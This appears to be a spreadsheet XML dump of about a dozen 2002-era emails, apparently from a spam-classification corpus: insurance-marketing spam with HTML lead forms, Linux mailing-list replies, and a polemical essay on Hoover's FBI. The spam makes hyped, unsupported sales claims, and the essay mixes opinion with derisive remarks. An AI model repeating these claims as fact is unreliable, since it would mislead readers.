 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/usaf/20020619-101.gif" =
 width=3D"550" height=3D"88" alt=3D"The Magical Solution that Triples =
 Index Annuity Sales!"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/usaf/20020619-102.jpg" =
 width=3D"269" height=3D"364"&gt;&lt;img =
 src=3D"http://iiq.us/images/usaf/20020619-103.gif" width=3D"281" =
 height=3D"364"&gt;&lt;br&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;font face=3D"Georgia, Times New Roman, Times, serif" =
 size=3D"2" color=3D"#000066"&gt;
             &lt;p&gt;As a unique promotional opportunity, &lt;b&gt;there is =
 currently no charge&lt;/b&gt;=20
               for our &amp;quot;Big-Hitter Sales Tool Combination&amp;quot; (for =
 the first=20
               199 respondents only).&lt;/p&gt;
             &lt;p&gt;This &amp;quot;Magic Solution&amp;quot; is already responsible =
 for countless=20
               &lt;b&gt;millions of dollars in Index Annuity premium and Agent =
 Sales=20
               Commissions&lt;/b&gt;. You honestly will not believe how simple =
 and easy=20
               this makes selling Index Annuities. It is literally like =
 falling=20
               off a log. As one rep stated, &amp;quot;You don't even have to =
 do anything=20
               different than you already are doing...it just kind of =
 happens...Kicks-in=20
               and starts generating new clients and uncovering assets =
 just like=20
               magic!&amp;quot;&lt;/p&gt;
             &lt;p&gt;&lt;b&gt;To claim your free Report and Bonus Audiotape, simply =
 call our=20
               24-hour automated response line!&lt;/b&gt; Simple and painless. =
 Call anytime=20
               (but be one of the first 199), the response line is fully =
 automated=20
               and works 24/7. Or, you can quickly fill out the form =
 below.&lt;/p&gt;
             &lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;Call today to receive this free report =
 and audiotape!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/usaf/20020618-2.gif" =
 width=3D"532" height=3D"113" alt=3D"800-436-1631 ext 86055"&gt;=20
             &lt;br&gt;
             &amp;#151; or can complete the form below &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#CCCCCC"&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Address:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"29%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"14%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"9%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"12%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Zip:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"23%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"zip" size=3D"5"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"12"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Fax:&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"2"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"fax" size=3D"12"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"3"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;&lt;img =
 src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"29%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"14%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td colspan=3D"2"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"usa@usa-financial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"USA Financial Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;a href=3D"http://www.usa-financial.com"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/usaf/20020402-6.gif" =
 width=3D"330" height=3D"90" border=3D"0" alt=3D"USA Financial - =
 www.usa-financial.com"&gt;&lt;/a&gt;=20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size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_253BBB_01C23BCA.9FD9F850--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: alsa-driver rebuild fails with undeclared USB symbol
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; Not me, but IMHO it's kind of offtopic to put it in freshrpms.net RPMs. 
 &gt; Upstream is the way to go...
 Agreed, especially since my packages are primarily meant for the original
 Red Hat Linux kernels. And someone removing USB support from his kernel is
 probably not going to recompile ALSA with *all* the drivers anyway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</si>
  <si>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RE: The Disappearing Alliance
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of R.
 A.
 &gt; Hettinga
 &gt; Subject: The Disappearing Alliance
 &gt; 
 &gt; http://www.techcentralstation.com/1051/printer.jsp?CID=1051-100802B
 &gt; 
 &gt; 
 &gt; 
 &gt; The Disappearing Alliance
 &gt; By Dale Franks 10/08/2002
 &gt; Obviously, in such a
 &gt; political atmosphere, the opportunities for conflict will inevitably
 &gt; increase.
 Given current trends, particularly in demographics, such conflict won't
 be military.  Europe wouldn't stand a chance now and things are getting
 worse in a hurry.  They are SOL.
 Not to mention that when push comes to shove they wouldn't stand united.
 &gt; 
 &gt; That thought is frightening enough. Even more frightening, however, is
 the
 &gt; thought that such a conflict might be averted by our own acceptance of
 the
 &gt; new ideology of transnational progressivism.
 Now that is a scary thought.
 ]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Public domain superheroes reborn in Tom Strong
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490211
 Date: Not supplied
 Great piece on the pulp comic characters that appear in the new series of Alan 
 Moore's _League of Extraordinary Gentlemen Tom Strong_ (thanks, Zed) funnybook. 
 These characters, like The Terror and The Fighting Yank, are in the public 
 domain because their original publishers didn't register (or renew, it's 
 unclear) their copyright, which means that they've been granted a new lease on 
 life in _Tom Strong_. The article segues into a very good discussion of the 
 public domain. This was just Slashdotted, so it might be a little slow, but 
 it's worth the wait. Link[1] Discuss[2] (_via /.[3]_)
 [1] http://www.newsarama.com/public.html
 [2] http://www.quicktopic.com/boing/H/MfCE7BXSmJdzp
 [3] http://slashdot.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] connecting at 1200bps in RH7.3 (help!)
</t>
  </si>
  <si>
    <t xml:space="preserve">Colin Nevin wrote:
 &gt; 
 &gt; Hi All,
 &gt; The modem handshake works at slightly higher speeds (4800bps to
 &gt; ~57600bps) but that is no good for tx/rx'ing data to the remote server
 &gt; as it insists at talking at the speed of treacle/1200bps.
 It sounds like the flow control is set to Xon/Xoff rather than hardware.
 &gt; Baud 1200 7 data bits Even Parity
 Unusual -  8 n 1 is more common.
 &gt; 
 &gt; I am doing a ATZ3 to reset the modem then I send this init string:
 &gt; 
 &gt; AT&amp;F1E1V1Q0X4Y0S32=232&amp;A1&amp;B0&amp;C1&amp;D2&amp;H0&amp;I0&amp;K1&amp;M4&amp;N0&amp;P0&amp;R1&amp;S0&amp;U0&amp;Y1
 I think that the AT command for hardware flow control is &amp;E4 though this
 may vary from modem to modem.
 Regards...zzzzcc
 -- 
 ********************************************
 John McCormac            * Hack Watch News
 zzzzcc@hackwatch.com       * 22 Viewmount, 
 Voice:   +353-51-873640  * Waterford,
 BBS&amp;Fax: +353-51-850143  * Ireland
 http://www.hackwatch.com/~kooltek
 ********************************************
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: 2.6
 mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
 ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
 TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
 tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
 YXRjaC5jb20=
 =sTfy
 -----END PGP PUBLIC KEY BLOCK-----
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[2]: Java is for kiddies
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net writes:
 &gt; SL&gt; &lt;snip&gt;
 &gt; SL&gt; Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
 &gt; SL&gt; &lt;/snip&gt;
 &gt; &lt;snip&gt;
 &gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
 &gt; SL&gt; come by. There's a company hiring in Mountain View, looking for a few good
 &gt; &lt;/snip&gt;
 &gt; 
 &gt; I give Adam an hour or so to come up with an adequate number of
 &gt; excuses as to why -this- job isn't worth it.  :)
 http://www.netli.com/careers/index.htm
 &gt;* Along with your resume, please answer this question: What does this C statement do? #define XY(s, m) (&amp;((s *)0)-&gt;m)
 Besides provide job security?
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are you ready for 10/5/2002?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_141E89_01C2631C.554EB1D0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  	 Are you ready for 10-5-2002?
  We are!
 Act Now... Call us today for more details
  800-550-2666 ext. 150
 - or - 
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
  Flynn Associates Insurance Marketing, Inc.
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt; 
 ------=_NextPart_000_141E89_01C2631C.554EB1D0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Are you ready for 10/5/2002?&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/flynn/20020903-101.jpg" =
 width=3D"274" height=3D"349"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/flynn/20020903-102.gif" =
 width=3D"276" height=3D"124" alt=3D"Are you ready for 10-5-2002?"&gt;&lt;br&gt;
 						&lt;img src=3D"http://iiq.us/images/flynn/20020903-103.gif" =
 width=3D"276" height=3D"82" alt=3D"We are!"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/flynn/20020903-104.gif" =
 width=3D"276" height=3D"143"&gt;&lt;/td&gt;
         &lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/flynn/20020903-105.gif" width=3D"550" =
 height=3D"10"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
       &lt;/table&gt;
 			&lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#336666"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/flynn/20020903-99.gif" =
 width=3D"1" height=3D"5"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font color=3D"#FFFFFF"&gt;&lt;b&gt;Act Now... Call us today for more =
 details&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/flynn/20020903-2.gif" =
 alt=3D"800-550-2666 ext. 150" width=3D"535" height=3D"110"&gt;&lt;br&gt;
             - or - &lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#003333"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q3.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jchandler@flynnassociates.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Flynn Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;img src=3D"http://iiq.us/images/flynn/20020903-3.gif" =
 alt=3D"Flynn Associates Insurance Marketing, Inc." width=3D"535" =
 height=3D"100"&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We don't =
 want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_141E89_01C2631C.554EB1D0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] RE: Newbie Question
</t>
  </si>
  <si>
    <t xml:space="preserve">Regarding:
 Another problem I have is that I cannot install my ISDN, USB modem ( LASAT Speed Basic ), however im pretty sure its not supported by Linux, but again it is featured in the Hardware Browser, without installed drivers.
 Thanks for your replies.... However i still cant get it to detect the External USB modem. I also have an internal 56k fax modem, but i cannot get that detected either ( maybe its because it was designed for Windows and is not supported ). Im not going to buy a new modem ( I think 2 is more than enough for 1 PC ).
 It could well be my inexperience with Linux that is making this more difficult, but whatever it is iv just about had enough!! Any last gasp ideas would be welcome
 Many Thanks
 Mark
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TGE: Thugs of South Boston and The Revenge of the Bandit Princess
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Thugs of South Boston and The Revenge of the Bandit Princess
 The Geodesic Economy
 Robert A. Hettinga
 Sunday, August 25, 2002
 (BOSTON) When you think about it one way, the FBI/Winter Hill vs.
 Patriarcha/Angiulo Cosa Nostra fight was just another race war
 between thugs.
 Put crudely, and at its most racist, the FBI and the Winter Hill Gang
 were the (mostly) Irish thugs, and Patriarcha's "family" were, of
 course, the (mostly) Italian thugs.
 Think Scorsese's upcoming "Gangs of New York", only with
 counter-reformatory overtones. Hoover's South Boston "social-club"
 putsch, starting in the mid 1960's, was particularly audacious in
 hindsight. The U.S. Federal Government actually decided to underwrite
 a reversal of the prohibition-era capture of the nation's rackets by
 the Italians from the Irish. The fact that the plot was hatched not
 for New York, but for South Boston, the most Irish place in the US,
 only makes even more gigantic the Big Lie that was told by the FBI to
 its ostensible political masters about bringing down organized crime
 there once and for all.
 The result, as we all found out, wasn't swapping the heroin of
 Italian Boston mob violence for Irish methadone. Hoover was,
 posthumously, swapping it for Oxycontin, or crystal methamphetamine
 - -- or, more properly, PCP. The absolute psychopathology of violence
 in Whitey Bulger's crack-cocaine-era reign of Boston's drug markets,
 like the identical FBI-sponsored reigns or violent horror by other
 also-rans in cities across the US as a whole, went up whole orders of
 magnitude, not mere percentage points.
 As Stalin said once, quantity has a quality all it's own. And, make
 no mistake, J. Edgar Hoover was directly responsible that "quality"
 of carnage, nation-wide.
 So, yes, on paper at least, it really *was* just the swapping of one
 gang of racist thugs for another, and the result was, on paper, at
 least, business as usual. Same stuff, different century, with
 apparently decent people like Mr. Salvati et.al accidently ground on
 the gears of "justice" like so much hamburger.
 However, to be much more macabre about it, that hamburger was
 "greasing", if you will, an auto de fe only a homicidal lunatic could
 love: a perfectly functioning market, legislated out of existence --
 on paper, if nowhere else -- by government fiat and the, back-door,
 but still elitist, will to power of H.L. Mencken's famous "bluenoses
 and busybodies".
 It all starts, like all true evil does, from the most innocent of
 beginnings. What she couldn't do to alcohol, teatotaling Mrs. Grundy
 then tried to do to anything else she could think of that had a
 smaller, "manageable" demand. The bloody result was, like nine more
 heads of the hydra, an increasingly ubiquitous universal prohibition,
 in more markets, and for more things, as the 20th century wore on.
 Every time some recreational drug was found to be addictive, or
 harmful, or physically distasteful, or carcinogenic -- or, now,
 apparently, fattening -- and then prohibited, exactly the same thing
 happened to its markets that happened to alcohol during the Volstead
 years. A *larger* market than before the prohibition. Hugely
 lucrative profits for anyone with the moral stomach to violently
 scale newly-legislated "barriers to competition" imposed on them by
 the state. Increasingly violent attacks by the government on users of
 those substances. And, finally, the ultimate in evil -- the kind of
 evil this country actually fought wars to end -- increasingly
 coercive axe-handle beatings, by our own government, of the sacred
 liberty of the average, but now unavoidably-law-breaking, citizenry.
 As Ayn Rand cynically observed a long time ago, you don't need
 government if nobody's breaking the law. In some twisted corollary to
 Parkinson's Law, governments, to survive, *need* more people,
 breaking more laws, or they can never justify the money they
 confiscate at tax time.
 And, to bring us back to the point, David Friedman would probably
 echo here his father Milton's famous observation that government
 regulations only benefit the regulated sellers in a given market, and
 never the consumer, much less the economy as a whole. Even,
 *especially*, if those sellers are *breaking* the law, as they are in
 the increasingly ubiquitous prohibition of risky behavior that our
 government now imposes on us.
 And there, absent the apparent grace of Mr. Hoover, went Mr. Salvati.
 In fact, Hayek himself, in "The Road to Serfdom", couldn't have
 predicted any better the gory consequences of Hoover's blatant
 imposition, "for our own good", of Vietnam-era statist power at the
 neighborhood level. And, furthermore, *Stalin* couldn't have had
 better "useful idiots" than Hoover did -- and neither, by an
 absolutely literal extension, did Whitey Bulger after Hoover.
 Useful idiots on both sides of the congressional aisle. Idiots who
 were eating out of Hoover's power-craven hand for the entire middle
 of the 20th century -- and Whitey Bulger's hand, whether they knew it
 or not, until the end of the millennium. A time, you'll notice, which
 saw the increasingly steady imposition of "mob" violence, and market
 control, from both state and illegal interests, way beyond the
 imaginings of even the most power-mad, rum-running, stock-kiting,
 movie-flopping, bureau-pumping, Nazi-appeasing Irish-Bostonian Little
 Caesar. Or, as for that matter, his safely trust-funded, and now
 strictly political, descendents.
 In terms of actual financial economics, think of what happened to Mr.
 Salvati and the others, dead or alive, as a "transfer-price", in
 human lives, of the inevitable consequence of MacNamara-style
 Vietnam-era Keynesian "social-cost" input-output accounting at its
 most despicable, and you can almost begin to fathom the atrocity that
 was committed by Hoover, and his co-religionists in state economic
 control, in the name of what really was, as you'll now agree, just a
 race war between thugs up in Boston.
 This shouldn't be a surprise, really. All race wars are at least
 fought by thugs, though they're usually conceived elsewhere, and
 endorsed, at the time, by all the "right" people, for all the "right"
 reasons.
 As far as the FBI itself goes, remember Mancur Olson's observation
 that a "prince" is just a stationary bandit.
 Though, given his penchant for women's clothing, for other men, and,
 what's actually obscene, for violently hypocritical treatment of
 people of his own affectional preference, I suppose we can call J.
 Edgar Hoover a bandit "princess", instead.
 "Bandit Queen", of course, would be a grievous insult to queens --
 and real bandits -- everywhere.
 Cheers,
 RAH
 - ---------
 http://www.nytimes.com/2002/08/25/national/25FBI.html?todaysheadlines=
 &amp;pagewanted=print&amp;position=top
 The New York Times
 August 25, 2002
 Hoover's F.B.I. and the Mafia: Case of Bad Bedfellows Grows By FOX
 BUTTERFIELD
 BOSTON, Aug. 24 - It was March 1965, in the early days of J. Edgar
 Hoover's war against the Mafia. F.B.I. agents, say Congressional
 investigators, eavesdropped on a conversation in the headquarters of
 New England's organized-crime boss, Raymond Patriarca.
 Two gangsters, Joseph Barboza and Vincent Flemmi, wanted Mr.
 Patriarca's permission to kill a small-time hoodlum, Edward Deegan,
 "as they were having a problem with him," according to an F.B.I. log
 of the conversation. "Patriarca ultimately furnished this O.K.," the
 F.B.I. reported, and three days later Mr. Deegan turned up dead in an
 alley, shot six times.
 It was an extraordinary situation: The Federal Bureau of
 Investigation had evidence ahead of time that two well-known
 gangsters were planning a murder and that the head of the New England
 Mafia was involved.
 But when indictments in the case were handed down in 1967, the real
 killers - who also happened to be informers for the F.B.I. - were
 left alone. Four other men were tried, convicted and sentenced to
 death or life in prison for the murder, though they had had nothing
 to do with it.
 One, Joseph Salvati, who spent 30 years in prison, filed notice with
 the Justice Department last week that he planned to sue the F.B.I.
 for $300 million for false imprisonment.
 His is the latest in a series of lawsuits against the F.B.I., the
 Justice Department and some F.B.I. agents growing out of the tangled,
 corrupt collaboration between gangsters and the F.B.I.'s Boston
 office in its effort to bring down the mob.
 The lawsuits are based on evidence uncovered in the last five years
 in a judicial hearing and a Justice Department inquiry. But some of
 the most explosive evidence has only recently come to light,
 including documents detailing conversation in which Mr. Patriarca
 approved the murder. They were released as part of an investigation
 by the House Committee on Government Reform, which has pressured the
 department into turning over records about the F.B.I in Boston.
 The documents show that officials at F.B.I. headquarters, apparently
 including Mr. Hoover, knew as long ago as 1965 that Boston agents
 were employing killers and gang leaders as informers and were
 protecting them from prosecution.
 "J. Edgar Hoover crossed over the line and became a criminal
 himself," said Vincent Garo, Mr. Salvati's lawyer. "He allowed a
 witness to lie to put an innocent man in prison so he could protect
 one of his informants."
 Mr. Barboza was a crucial witness at trial against Mr. Salvati and
 may have implicated him because Mr. Salvati owed $400 to a loan shark
 who worked for Mr. Barboza.
